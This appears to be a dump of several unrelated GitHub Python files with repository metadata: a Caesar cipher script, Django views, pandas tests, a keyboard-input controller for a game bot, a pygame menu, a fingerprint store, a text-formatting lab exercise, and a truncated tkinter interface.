interface '''\r\n# load import modules\r\nimport sys\r\nsys.tracebacklimit=0\r\n\r\n# create a list and variables to store user inputs\r\nalphaList = list(\"ABCDEFGHIJKLMNOPQRSTUVWXYZ\") # list will contain all uppercase alphabet characters only\r\n\r\n# define argument variables\r\nshift=\"\" # placeholder for user error checking\r\ntext=sys.argv[2]\r\n\r\n# checks for user input errors on the command line\r\nwhile shift == \"\" :\r\n try:\r\n shift = int(sys.argv[1]) % 26\r\n except (ValueError, TypeError):\r\n print(\"ERROR 01 - Please only use whole number values for argument 1 (shift value) \")\r\n break\r\n\r\n# combined functions to produce encrypted text from converted text\r\ndef encrypt_Caesar(shift, text):\r\n rep=text.replace(\".\", \"X\")\r\n repJoin=\"\".join(char for char in rep if char.isalpha())\r\n output=(repJoin.upper())\r\n shiftedAlpha = alphaList[shift:] + alphaList[:shift] \r\n cipherList = [] \r\n for words in output: \r\n prepText = \"\" \r\n for letter in words: \r\n prepText += shiftedAlpha[alphaList.index(letter)] \r\n cipherList.append(prepText) \r\n global encryptedText\r\n encryptedText = (\"\".join(cipherList)) \r\n return encryptedText \r\n \r\nencryptedText=encrypt_Caesar(shift, text)\r\nprint(\"Encrypted text is: \", encryptedText, end=\"\")","repo_name":"J68B/TAFE-Beginner_Python_Code_T2","sub_path":"c1.py","file_name":"c1.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"10070161227","text":"from django.shortcuts import render\nfrom .models import employee\n\n# Create your views here.\ndef showindex(request):\n emp = employee.objects.all()\n return render(request, \"index.html\",{\"pro\":emp})\ndef display(request):\n from .models import employee\n emp = employee.objects.all()\n Eid=int(request.POST.get(\"id\"))\n Ename=request.POST.get(\"name\")\n Ecno=int(request.POST.get(\"cno\"))\n Esal=float(request.POST.get(\"sal\"))\n from app7.models import employee\n e1=employee(Eid,Ename,Ecno,Esal)\n e1.save()\n emp = employee.objects.all()\n return render(request,\"index.html\",{\"pro\":emp})\n\ndef deletedetails(request):\n del_id=int(request.POST.get(\"delete_id\"))\n print(del_id)\n from .models import employee\n employee.objects.filter(id=del_id).delete()\n emp = employee.objects.all()\n return render(request,\"index.html\",{\"pro\":emp})\n\ndef updatedetails(request):\n id = int(request.GET.get(\"update_id\"))\n e2 = employee.objects.filter(id=id).update()\n print(id)\n print(e2)\n e3=employee.objects.filter(id=id).values()\n print(e3)\n return render(request,\"index.html\",{\"no\":id})","repo_name":"prasadnaidu1/django","sub_path":"real7/app7/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"17533275611","text":"from pandas.api.types import CategoricalDtype\nfrom preprocessing.src.feature_engineering import (\n add_first_time_user,\n clean_data,\n hips_to_bins,\n main,\n remove_unrequired_entries,\n)\n\nfrom pypely import pipeline\n\n\ndef test_main(mocker, data_snippet):\n mocker.patch(\"preprocessing.src.feature_engineering.load_data\", return_value=data_snippet)\n\n main()\n\n\ndef test_clean_data(data_snippet):\n to_test = clean_data(data_snippet)\n\n expected_category_columns = [\"bra_size\", \"category\", \"cup_size\", \"fit\", \"quality\", \"shoe_size\", \"shoe_width\"]\n category_type = [is_type_category(to_test, col) for col in expected_category_columns]\n assert all(category_type)\n\n\ndef test_add_first_time_user(data_snippet):\n to_test = pipeline(\n clean_data,\n add_first_time_user,\n )(data_snippet)\n\n assert \"first_time_user\" in to_test.columns\n\n\ndef test_hips_to_bins(data_snippet):\n to_test = hips_to_bins(data_snippet)\n\n assert is_type_category(to_test, \"hips\")\n assert has_no_NaN_entries(to_test, \"hips\")\n\n\ndef test_remove_unrequired_entries(data_snippet):\n to_test = remove_unrequired_entries(data_snippet)\n expected_removed_columns = [\"waist\", \"bust\", \"user_name\"]\n column_not_in_to_test = [not has_column(to_test, col) for col in expected_removed_columns]\n\n assert has_no_NaN_entries(to_test, \"height\")\n assert has_no_NaN_entries(to_test, \"length\")\n assert has_no_NaN_entries(to_test, \"quality\")\n assert all(column_not_in_to_test)\n\n\ndef has_column(df, col):\n return col in df.columns\n\n\ndef has_no_NaN_entries(to_test, col):\n return sum(to_test[col].isnull()) == 0\n\n\ndef is_type_category(df, column):\n return type(df[column].dtype) == CategoricalDtype\n","repo_name":"stoney95/pypely","sub_path":"examples/preprocessing/tests/test_feature_engineering.py","file_name":"test_feature_engineering.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"36"} +{"seq_id":"8418183650","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 2 23:01:11 2020\n\n@author: wobee\n\"\"\"\n\nimport ctypes\nfrom gym import spaces\nfrom enum import IntEnum\nclass Button(IntEnum):\n A = 0\n B = 1\n X = 2\n Z = 3\n L = 4\n UP = 5\n DOWN = 6\n LEFT = 7\n RIGHT =8 \n C_UP = 9\n C_DOWN = 10\n C_LEFT = 11\n C_RIGHT = 12\n\nKEYBOARD_MAPPING = {\n Button.A: 0x1E, # a key on keyboard\n Button.B: 0x30, # b key on keyboard\n Button.X: 0x2D, # x key on keyboard\n Button.Z: 0x2C, # z key on keyboard\n Button.L: 0x26, # l key on keyboard\n Button.UP: 0xC8, # up\n Button.DOWN: 0xD0, # down\n Button.LEFT: 0xCB, # left\n Button.RIGHT: 0xCD, # right\n Button.C_UP: 0x14, # t\n Button.C_LEFT: 0x21, # f\n Button.C_RIGHT: 0x23, # h\n Button.C_DOWN: 0x22 # g\n}\n\n# Keyboard event hexcode\nKEYEVENTF_SCANCODE = 0x0008 # Code for detecting when key is pressed\nKEYEVENTF_KEYUP = 0x0002\n\n# Function to simulate keyboard/mouse inputs\nSendInput = ctypes.windll.user32.SendInput\n\n# C structures used with SendInput\nPUL = ctypes.POINTER(ctypes.c_ulong)\nclass KeyBdInput(ctypes.Structure):\n _fields_ = [(\"wVk\", ctypes.c_ushort),\n (\"wScan\", ctypes.c_ushort),\n (\"dwFlags\", ctypes.c_ulong),\n (\"time\", ctypes.c_ulong),\n (\"dwExtraInfo\", PUL)]\n\nclass HardwareInput(ctypes.Structure):\n _fields_ = [(\"uMsg\", ctypes.c_ulong),\n (\"wParamL\", ctypes.c_short),\n (\"wParamH\", ctypes.c_ushort)]\n\nclass MouseInput(ctypes.Structure):\n _fields_ = [(\"dx\", ctypes.c_long),\n (\"dy\", ctypes.c_long),\n (\"mouseData\", ctypes.c_ulong),\n (\"dwFlags\", ctypes.c_ulong),\n (\"time\",ctypes.c_ulong),\n (\"dwExtraInfo\", PUL)]\n\nclass Input_I(ctypes.Union):\n _fields_ = [(\"ki\", KeyBdInput),\n (\"mi\", MouseInput),\n (\"hi\", HardwareInput)]\n\nclass Input(ctypes.Structure):\n _fields_ = [(\"type\", ctypes.c_ulong),\n (\"ii\", Input_I)]\n\ndef press_key(key):\n assert key in KEYBOARD_MAPPING\n hexKeyCode = KEYBOARD_MAPPING[key]\n extra = ctypes.c_ulong(0)\n ii_ = Input_I()\n ii_.ki = KeyBdInput(0, hexKeyCode, KEYEVENTF_SCANCODE, 0, ctypes.pointer(extra))\n x = Input(ctypes.c_ulong(1), ii_)\n SendInput(1, ctypes.pointer(x), ctypes.sizeof(x))\n\ndef release_key(key):\n assert key in KEYBOARD_MAPPING\n hexKeyCode = KEYBOARD_MAPPING[key]\n extra = ctypes.c_ulong(0)\n ii_ = Input_I()\n ii_.ki = KeyBdInput(0, hexKeyCode, KEYEVENTF_SCANCODE | KEYEVENTF_KEYUP, 0, ctypes.pointer(extra))\n x = Input(ctypes.c_ulong(1), ii_)\n SendInput(1, ctypes.pointer(x), ctypes.sizeof(x))\n\nBUTTONS = (Button.A, Button.B, Button.X, Button.Z, Button.L, Button.UP, Button.DOWN, Button.LEFT, Button.RIGHT, Button.C_UP, Button.C_DOWN, Button.C_LEFT, Button.C_RIGHT)\nfrom time import sleep\nclass KeyBoard():\n def __init__(self):\n self.state = [False for _ in range(len(BUTTONS))]\n\n def press_button(self, button):\n press_key(button)\n self.state[button] = True\n\n\n def release_button(self, button):\n release_key(button)\n self.state[button] = False\n\n def get_action_space(self):\n n_spaces = len(BUTTONS)\n return spaces.MultiBinary(n_spaces)\n \n def send_inputs(self, actions):\n for i, action in enumerate(actions):\n self.process_action(i,action)\n # print(self.state[i], bool(action))\n # if self.process_action(i,action):\n # print('\\tUpdated', self.state[i])\n # print()\n \n \n def process_action(self, button_index, action):\n if self.state[button_index] == bool(action):\n return False\n else:\n # sleep(.05)\n # print(BUTTONS[button_index])\n if bool(action):\n self.press_button(BUTTONS[button_index])\n else:\n self.release_button(BUTTONS[button_index])\n return True\n","repo_name":"wobeert/Melee-Bot","sub_path":"gym-melee/gym_melee/envs/Controllers/KeyBoard.py","file_name":"KeyBoard.py","file_ext":"py","file_size_in_byte":4096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"5843851117","text":"import cx_Freeze\r\nimport sys\r\nimport os\r\n\r\nos.environ['TCL_LIBRARY'] = \"C:\\\\python\\\\tcl\\\\tcl8.6\"\r\nos.environ['TK_LIBRARY'] = \"C:\\\\python\\\\tcl\\\\tk8.6\"\r\n\r\nbase = None\r\n\r\nif sys.platform == 'win32':\r\n base = \"WIN32GUI\"\r\n\r\n\r\nexecutables = [cx_Freeze.Executable(\"Chem1101_Lab_Support.py\",base=base,icon=\"icon.ico\")]\r\n\r\ncx_Freeze.setup(\r\n name = \"Chem1101_Lab_Support\",\r\n options = {\"build_exe\":{\"packages\":[\"tkinter\"],\"include_files\":[os.path.join('C:\\python','DLLs','tk86t.dll'),os.path.join('C:\\python','DLLs','tcl86t.dll'),\"icon.ico\",\"image1.png\",\"image2.png\",\"image3.png\",\"image4.png\",\"image5.png\",\"image6.png\"]}},\r\n version = \"0.1\",\r\n description = \"Chem1101 Lab application\",\r\n executables = executables\r\n )\r\n","repo_name":"Samuelczhu/Chem1101-Lab-Support","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"16379736298","text":"from math import inf\n\nfrom .utils import divisible\n\nclass ParameterList:\n \"\"\"\n Prepresents a product of a list and a dictionary.\n keys(), values() and items() all return from both list and dict part\n keeps order\n \"\"\"\n\n def __init__(self, args, kwargs):\n self.args = list(args)\n self.kwargs = dict(kwargs)\n\n def keys(self):\n yield from range(len(self.args))\n yield from sorted(self.kwargs.keys())\n\n def values(self):\n yield from self.args\n for k in sorted(self.kwargs.keys()):\n yield self.__getitem__(k)\n\n def items(self):\n yield from enumerate(self.args)\n yield from sorted(self.kwargs.items())\n\n def append(self, value):\n self.args.append(value)\n\n def extend(self, list_arg):\n self.args.extend(list_arg)\n\n def update(self, arg, overwrite=True):\n\n if not overwrite:\n if isinstance(arg, ParameterList):\n args = arg.args\n kwargs = arg.kwargs\n elif isinstance(arg, Sequence):\n args = arg\n kwargs = {}\n elif isinstance(arg, Mapping):\n args = []\n kwargs = arg\n\n assert not any(kwargs.keys() for k in self.keys()), \\\n 'Parameterlists with common keyword argument cannot be combined'\n\n self.extend(args)\n self.kwargs.update(kwargs)\n\n else:\n raise NotImplementedError()\n\n def get(self, key, default=None):\n if key in self.keys():\n return self[key]\n else:\n return default\n\n def __iter__(self):\n return self.values()\n\n @staticmethod\n def _test_slice(key):\n if key.start == None:\n raise KeyError('Start cannot be None!')\n if key.stop == None:\n raise KeyError('Stop cannot be None!')\n if key.step != None:\n raise KeyError('Step must be None!')\n\n @classmethod\n def from_dict(cls, dict_arg):\n return cls.from_items(dict_arg.items())\n\n @classmethod\n def from_items(cls, items):\n num_items = []\n kwargs = {}\n for k,v in items:\n if type(k) == int:\n num_items.append((k,v))\n elif type(k) == str:\n kwargs[k] = v\n else:\n raise KeyError('Key must be str or int.')\n num_items.sort()\n\n if num_items:\n indices, args = zip(*num_items)\n else:\n indices = args = ()\n\n assert tuple(range(len(indices))) == indices, \\\n 'integer keys must have all integers from 0 to n'\n return cls(args, kwargs)\n\n def __getitem__(self, key):\n if type(key) == int:\n return self.args[key]\n elif type(key) == str:\n return self.kwargs[key]\n else:\n raise ValueError('Invalid index/key type: %s' % type(key))\n\n def __setitem__(self, key, val):\n if type(key) == int:\n self.args[key] = val\n elif type(key) == str:\n self.kwargs[key] = val\n else:\n raise ValueError('Only str and int are valied keys.')\n\n def __str__(self):\n args_str = map(str, self.args)\n kwargs_str = ('%s=%s' % item for item in self.kwargs.items())\n return ', '.join([*args_str, *kwargs_str])\n\n def __len__(self):\n return len(self.args) + len(self.kwargs)\n\n \"\"\"def __repr__(self):\n args_str = map(repr, self.args)\n kwargs_str = ('%s=%r' % item for item in self.kwargs.items())\n params = ', '.join([*args_str, *kwargs_str])\n return '%s(%s)' % (self.__class__.__name__, params)\"\"\"\n\n def __lshift__(self, arg):\n if type(arg) == ParameterList:\n self.extend(arg.args)\n self.update(arg.kwargs, overwrite=False)\n else:\n self.append(arg)\n\n\nclass Interval:\n \"\"\"Used to represent a discrete or continous range of values.\"\"\"\n\n def __init__(self, start, stop, step, left_closed=True, right_closed=False):\n assert start < stop\n assert step >= 0\n self.start = start\n self.stop = stop\n self.step = step\n self.left_closed = left_closed\n self.right_closed = right_closed\n\n @property\n def bounded(self):\n return self.start > -inf and self.stop < inf\n\n @property\n def closed(self):\n return self.left_closed or self.right_closed\n\n def __contains__(self, arg):\n start, stop, step = self.start, self.stop, self.step\n\n if isinstance(arg, (int, float)):\n if not (start <= arg <= stop):\n return False\n if arg == start :\n return self.left_closed\n if arg == stop and not self.right_closed:\n return False\n if step == 0:\n return True\n return divisible(arg - start, step)\n\n if isinstance(arg, Intervall):\n if not (arg.start in self and arg.stop in self):\n return False\n if step == 0:\n return True\n if arg.step < step:\n return False\n raise NotImplementedError()\n\n return False\n\n def __getitem__(self, key):\n # TODO: make step actually more meaningfull\n if not type(key) is slice:\n raise KeyError(key)\n\n start = self.start if key.start is None else key.start\n stop = self.stop if key.stop is None else key.stop\n step = self.step if key.step is None else key.step\n left_closed = False if start == -inf else self.step or self.left_closed\n right_closed = False if stop == inf else self.step or self.right_closed\n\n # check types\n for s in (start, stop, step):\n if type(s) not in {int, float}:\n raise KeyError('Start and Stop must be Numbers!')\n\n return Interval(\n start, stop, step, left_closed, right_closed)\n\n def __iter__(self):\n if self.step == 0:\n raise NotIterableError('Continuous interval cannot be iterated.')\n if not self.bounded:\n raise Warning('Iteration of infinite %s will take forever.' % self)\n raise NotImplementedError()\n\n if self.left_closed:\n yield self.start\n\n values = iter(range(self.start, self.stop, self.step))\n next(values) # skip start value\n for val in values:\n yield val\n\n # how to avoid floating point arithmetics erros here\n if self.left_closed and val + self.step == self.stop:\n return self.stop\n\n def len(self):\n # TODO check for one element intervals\n if self.step == 0 or not self.bounded:\n return inf\n bounds = self.left_closed + self.right_closed\n return self.stop - self.start - bounds\n\n def __str__(self):\n # return 'Interval(%s, %s, %s)' % (self.start, self.stop, self.type_)\n stop, start, step = self.stop, self.start, self.step\n\n return '{name}{left}{start}:{stop}{step}{right}'.format(\n name = 'Cont' if step == 0 else 'Disc',\n left = '[' if self.left_closed else '(',\n start = '-∞' if start == -inf else start,\n stop = '∞' if stop == inf else stop,\n step = '' if step in {0,1} else ':%s' % step,\n right = ']' if self.right_closed else ')',\n )\n\n\n# --------------- Predifined Domains ---------------------------------------- #\n\nN = Interval(\n start = 1,\n stop = inf,\n step = 1,\n left_closed = True,\n right_closed = False)\n\nN0 = Interval(\n start = 0,\n stop = inf,\n step = 1,\n left_closed = True,\n right_closed = False)\n\nZ = Interval(\n start = -inf,\n stop = inf,\n step = 1,\n left_closed = False,\n right_closed = False,)\n\nR = Interval(\n start = -inf,\n stop = inf,\n step = 0,\n left_closed = False,\n right_closed = False,)\n\n\n# -------------------------- Errors ----------------------------------------- #\n\nclass NotIterableError(Exception):\n pass\n","repo_name":"Mome/baumschule","sub_path":"baumschule/core/domains.py","file_name":"domains.py","file_ext":"py","file_size_in_byte":8066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"10860749443","text":"import pygame\nimport buttons\nimport main\nimport pick_background\nimport redraw_window\n\npygame.init()\n\nscreen_x = 1280 # Screen dimension x\nscreen_y = 720 # Screen dimension y\nwindow = pygame.display.set_mode((screen_x, screen_y))\n\nbg = pygame.image.load('background/dragon_ball_z_bg.png') # Importing background image\nplay_btn_img = pygame.image.load('background/btn/play_btn_red.png')\nquit_btn_img = pygame.image.load('background/btn/exit_btn_red.png')\nplay_btn_toggle_img = pygame.image.load('background/btn/play_btn_yellow.png')\nquit_btn_toggle_img = pygame.image.load('background/btn/exit_btn_yellow.png')\n\nwidth = 300\nheight = 95\nplay_btn = buttons.button(screen_x / 2 - width / 2 - 200, screen_y / 2 - height / 2 - 50, width, height, (0, 0, 255), '', play_btn_img)\nquit_btn = buttons.button(screen_x / 2 - width / 2 + 200, screen_y / 2 - height / 2 - 50, width, height, (0, 0, 255), '', quit_btn_img)\ndim_screen = pygame.Surface((screen_x, screen_y)).convert_alpha()\ndim_screen.fill((0, 0, 0, 130))\n\nmenu = True\nbackground = True\n\npygame.mixer.music.load('sound/dragon_ball_bg.mp3')\npygame.mixer.music.set_volume(0.15)\npygame.mixer.music.play(-1)\n\nhover_btn = pygame.mixer.Sound('sound/hover_btn.wav')\nplay_1 = True\nplay_2 = True\n\nwhile menu:\n window.blit(bg, (0, 0))\n #window.blit(dim_screen, (0, 0))\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n menu = False\n if menu:\n play_btn.draw(window, False)\n quit_btn.draw(window, False)\n pos = pygame.mouse.get_pos()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if play_btn.is_over(pos):\n pick_background.pick_background(window)\n if pick_background.exit_game:\n menu = False\n else:\n main.game_loop()\n if main.game_quit:\n menu = False\n if quit_btn.is_over(pos):\n menu = False\n\n if event.type == pygame.MOUSEMOTION:\n if play_btn.is_over(pos):\n if play_1:\n hover_btn.play()\n play_1 = False\n play_btn.image = play_btn_toggle_img\n elif not play_btn.is_over(pos):\n play_1 = True\n play_btn.image = play_btn_img\n if quit_btn.is_over(pos):\n if play_2:\n hover_btn.play()\n play_2 = False\n quit_btn.image = quit_btn_toggle_img\n elif not play_btn.is_over(pos):\n play_2 = True\n quit_btn.image = quit_btn_img\n pygame.display.update()\n\npygame.quit()\n\n","repo_name":"Ace5584/DragonBall-Combat-Game","sub_path":"DragonBallCombatGame/start_menue.py","file_name":"start_menue.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"18322451772","text":"import fingerprint_object\n\nclass FingerprintData():\n \n fingers = []\n \n def __init__(self):\n self.readFromFile('Data.txt')\n \n def isRegistered(self, pId):\n for i in self.fingers:\n if i.visitorId == pId:\n return i.image\n return 0\n \n def writeFingerprint(self, pVisitorId, pImage):\n newObject = fingerprint_object.FingerprintObject()\n newObject.visitorId = pVisitorId\n newObject.image = pImage\n self.fingers.append(newObject)\n self.writeToFile('Data.txt')\n \n def writeToFile(self, pFilePath):\n \n with open(pFilePath, 'w') as f:\n for _object in self.fingers:\n f.write(str(_object.visitorId) + '\\n')\n for _row in _object.image:\n f.write(str(int.from_bytes(_row, byteorder = 'big')) + '\\n')\n f.write('%%ObjectEnd%%' + '\\n')\n \n def readFromFile(self, pFilePath):\n \n count = 0\n lineIndex = 0\n newObject = fingerprint_object.FingerprintObject()\n with open(pFilePath) as f:\n for _line in f:\n if lineIndex == 0:\n newObject.image = []\n newObject.visitorId = _line.rstrip()\n lineIndex += 1\n else:\n if _line.rstrip() == '%%ObjectEnd%%':\n self.fingers.append(newObject)\n newObject = fingerprint_object.FingerprintObject()\n lineIndex = 0\n else:\n newObject.image.append(int(_line.rstrip()).to_bytes(128, byteorder = 'big'))\n lineIndex += 1\n \n \n \n","repo_name":"HWRmeetsTierpark/HWRTP-device-interface","sub_path":"FingerprintSensor/fingerprint_data.py","file_name":"fingerprint_data.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"75156389864","text":"# Кузнецов Денис ИУ7-13Б\r\n# Программa для выполнения некоторых операций с текстом\r\n\r\n\r\nfrom def_fool import check_int_number, check_material_number,\\\r\n delete_leading_spaces\r\n\r\n\r\ndef menu():\r\n print('1. Выровнять текст по левому краю\\n\\\r\n2. Выровнять текст по правому краю\\n\\\r\n3. Выровнять текст по ширине\\n\\\r\n4. Удаление заданного слова\\n\\\r\n5. Замена одного слова другим во всём тексте\\n\\\r\n6. Вычисление арифметических выражений для операций умножение и деление\\n\\\r\n7. Предложение с максимальным количеством слов, в котором гласные \\\r\nчередуются с согласными.')\r\n\r\n\r\ndef print_text(text):\r\n for row in text:\r\n print(row)\r\n \r\ndef text_align_left():\r\n global text\r\n n = len(text)\r\n for i in range(n):\r\n text[i] = ' '.join(text[i].split())\r\n print(text[i])\r\n \r\ndef text_align_right():\r\n global text\r\n n = len(text)\r\n max_item = 0\r\n if n > 0:\r\n max_count = len(text[0])\r\n else:\r\n max_count = 0\r\n for i in range (1,n):\r\n if len(text[i]) > max_count:\r\n max_count = len(text[i])\r\n max_item = i\r\n for i in range (n):\r\n text[i] = ' '.join(text[i].split())\r\n text[i] = (' '*(max_count - len(text[i]))+text[i])\r\n print(text[i])\r\n\r\ndef text_align_width():\r\n global text\r\n n = len(text)\r\n max_item = 0\r\n if n > 0:\r\n max_count = len(text[0])\r\n else:\r\n max_count = 0\r\n for i in range (1,n):\r\n if len(text[i]) > max_count:\r\n max_count = len(text[i])\r\n max_item = i\r\n for i in range (n):\r\n text[i] = delete_leading_spaces(text[i])\r\n now = max_count - len(text[i])\r\n zn = text[i].count(' ')\r\n if zn == 0:\r\n print(text[i])\r\n continue\r\n remainder = now % zn\r\n ch = now // zn + 1\r\n str_now = ''\r\n for j in text[i].split():\r\n str_now += j + ' '*ch\r\n if remainder:\r\n str_now += ' '\r\n remainder -= 1\r\n str_now = delete_leading_spaces(str_now)\r\n text[i] = str_now\r\n print(str_now)\r\n \r\ndef delete_word(text):\r\n word = input('Введите слово, которое нужно удалить: ')\r\n length_word = len(word)\r\n for i in range(len(text)):\r\n flag = 1\r\n while flag:\r\n for j in range(len(text[i]) - length_word + 1):\r\n if text[i][j:j+length_word] == word:\r\n if j == 0 and j + length_word == len(text[i]):\r\n text[i] = text[i].replace(text[i][j:j+length_word], '', 1)\r\n flag = 1\r\n break\r\n elif j > 0 and j + length_word == len(text[i]):\r\n if text[i][j-1] == ' ':\r\n text[i] = text[i].replace(text[i][j-1:j+length_word], '', 1)\r\n flag = 1\r\n break\r\n elif text[i][j-1] == '(':\r\n text[i] = text[i].replace(text[i][j:j+length_word], '', 1)\r\n flag = 1\r\n break\r\n elif j == 0 and j + length_word < len(text[i]):\r\n if text[i][j + length_word] in ' ,.;:!?)':\r\n text[i] = text[i].replace(text[i][j:j+length_word+1], '', 1)\r\n flag = 1\r\n break\r\n else:\r\n if text[i][j-1] == ' ' and text[i][j+length_word] in ' ,.;:!?)':\r\n text[i] = text[i].replace(text[i][j-1:j+length_word], '', 1)\r\n flag = 1\r\n break\r\n elif text[i][j-1] == '(' and text[i][j+length_word] in ' ,.;:!?)':\r\n text[i] = text[i].replace(text[i][j:j+length_word], '', 1)\r\n flag = 1\r\n break\r\n else:\r\n flag = 0\r\n \r\ndef change_word(text):\r\n word = input('Введите слово, которое хотите заменить: ')\r\n new_word = input('Введите слово, на которое нужно заменить старое: ')\r\n flag = 1\r\n length_word = len(word)\r\n for i in range(len(text)):\r\n flag = 1\r\n while flag:\r\n for j in range(len(text[i]) - length_word + 1):\r\n if text[i][j:j+length_word] == word:\r\n if j == 0 and j + length_word == len(text[i]):\r\n text[i] = text[i].replace(text[i][j:j+length_word], new_word + ' ', 1)\r\n flag = 0\r\n break\r\n elif j > 0 and j + length_word == len(text[i]):\r\n if text[i][j-1] == ' ':\r\n text[i] = text[i].replace(text[i][j-1:j+length_word], ' ' + new_word, 1)\r\n flag = 0\r\n break\r\n elif text[i][j-1] == '(':\r\n text[i] = text[i].replace(text[i][j:j+length_word], ' ' + new_word, 1)\r\n flag = 0\r\n break\r\n elif j == 0 and j + length_word < len(text[i]):\r\n if text[i][j + length_word] in ' ,.;:!?)':\r\n text[i] = text[i].replace(text[i][j:j+length_word+1], new_word + ' ', 1)\r\n flag = 0\r\n break\r\n else:\r\n if text[i][j-1] == ' ' and text[i][j+length_word] in ' ,.;:!?)':\r\n text[i] = text[i].replace(text[i][j-1:j+length_word], ' '+new_word, 1)\r\n flag = 0\r\n break\r\n elif text[i][j-1] == '(' and text[i][j+length_word] in ' ,.;:!?)':\r\n text[i] = text[i].replace(text[i][j:j+length_word], ' '+new_word, 1)\r\n flag = 0\r\n break\r\n else:\r\n flag = 0\r\n\r\n\r\ndef delim(a):\r\n if a==' ':\r\n return True\r\n return False\r\n\r\ndef process_op(r,l,op):\r\n if op=='+':\r\n return r+l\r\n if op=='-':\r\n return l-r\r\n if op=='*':\r\n return r*l\r\n if op=='/':\r\n if r == 0:\r\n return \"ERROR\"\r\n return l/r\r\n if op=='%':\r\n return l%r\r\n\r\ndef priority(a):\r\n if a in ['+','-']:\r\n return 1\r\n if a in ['*','/','%']:\r\n return 2\r\n return -1\r\n\r\ndef calculation(s):\r\n st =[]\r\n op = []\r\n t = len(s)\r\n i = 0\r\n while i < t:\r\n if delim(s[i]):\r\n i += 1\r\n continue\r\n if s[i]=='(':\r\n op.append('(')\r\n elif s[i]==')':\r\n while op[-1]!='(':\r\n u = process_op(st[-1],st[-2],op[-1])\r\n st.pop()\r\n st.pop()\r\n st.append(u)\r\n op.pop()\r\n op.pop()\r\n elif s[i] in ['*','/']:\r\n curop=s[i]\r\n f=priority(curop)\r\n while op!=[] and priority(op[-1])>=f:\r\n u = process_op(st[-1],st[-2],op[-1])\r\n st.pop()\r\n st.pop()\r\n st.append(u)\r\n op.pop()\r\n op.append(curop)\r\n else:\r\n operand=s[i]\r\n while i+1 max_count:\r\n max_count = temp_count\r\n search_sentence = temp_sentence\r\n temp_sentence = ''\r\n temp_count = 0\r\n\r\n elif temp_word[len(temp_word)-1] == ',;:':\r\n if check_vowels_consonants(temp_word[:len(temp_word)-1]):\r\n temp_count += 1\r\n \r\n else:\r\n if check_vowels_consonants(temp_word):\r\n temp_count += 1\r\n \r\n if not flag:\r\n flag = 1\r\n else:\r\n temp_sentence += temp_word + ' '\r\n \r\n print(search_sentence) \r\n \r\nlength = float('-inf') \r\ntext = ['Я Октябрь уж Я наступил — уж роща отряхает Я',\r\n 'Последние 2*2*2/ 5 листы. с 2 + 2 нагих своих ветвей;',\r\n 'Дохнул осенний хлад — дорога промерзает',\r\n 'Журча еще бежит за мельницу ручей,',\r\n '2 *2 * 2. Но пруд уже застыл; сосед мой поспешает',\r\n 'В отъезжие поля. амам мама олол лол с охотою своей рор оро вав ава оло оло оло оло оло оло оло ,',\r\n 'И страждут озими от бешеной забавы,',\r\n 'И будит лай собак уснувшие дубравы.',\r\n '',\r\n 'lksdjf']\r\n\r\nfor i in range(len(text)):\r\n if len(text[i]) > length:\r\n length = len(text[i])\r\n\r\nmenu()\r\nx = 0\r\nprint_text(text)\r\nwhile x != -1:\r\n x = input('Введите номер функции: ')\r\n while not check_int_number(x):\r\n x = input('Введите номер функции: ')\r\n x = int(x)\r\n if x == 1:\r\n text_align_left()\r\n elif x == 2:\r\n text_align_right()\r\n elif x == 3:\r\n text_align_width()\r\n elif x == 4:\r\n delete_word(text)\r\n elif x == 5:\r\n change_word(text)\r\n elif x == 6:\r\n count_expression(text)\r\n elif x == 7:\r\n find_max_words(text)\r\n else:\r\n print('Неверно введен номер функции!')\r\n \r\n\r\n\r\n","repo_name":"Denis926178/Python","sub_path":"lab11.py","file_name":"lab11.py","file_ext":"py","file_size_in_byte":12412,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"25967679157","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jun 8 19:18:55 2021\r\n\r\n@author: ghaith\r\n\"\"\"\r\nfrom numpy import *\r\nfrom tkinter import *\r\nimport tkinter\r\nfrom tkinter import filedialog\r\nimport cv2 as cv\r\nfrom PIL import ImageTk,Image\r\nimport os\r\nimport matplotlib.pyplot as plt\r\nimport tensorflow as tf\r\nimport tensorflow_hub as hub\r\nimport numpy as np\r\nimport IPython.display as display\r\nimport functools\r\nimport PIL.Image\r\n\r\nroot = Tk()\r\nroot.title(\"artistic style\")\r\nroot.minsize(width=300,height=340)\r\nroot.geometry(\"905x1280\")\r\nsame=True\r\nn=0.5\r\ni=1\r\n# Adding a background image\r\nbackground_image =Image.open(r\"C:\\Users\\ghaith\\Desktop\\Artistic style project\\interface\\photo_2021-06-08_19-35-10.jpg\")\r\n[imageSizeWidth, imageSizeHeight] = background_image.size\r\n\r\nnewImageSizeWidth = int(imageSizeWidth*n)\r\nif same:\r\n newImageSizeHeight = int(imageSizeHeight*n) \r\nelse:\r\n newImageSizeHeight = int(imageSizeHeight/n) \r\n#m1=Image.open(\"4.jpg\") \r\nbackground_image = background_image.resize((newImageSizeWidth,newImageSizeHeight),Image.ANTIALIAS)\r\nimg = ImageTk.PhotoImage(background_image)\r\n#Canvas1 = Canvas(root)\r\n#Canvas1.create_image(300,340,image = img) \r\n#Canvas1.config(bg=\"white\",width = newImageSizeWidth, height = 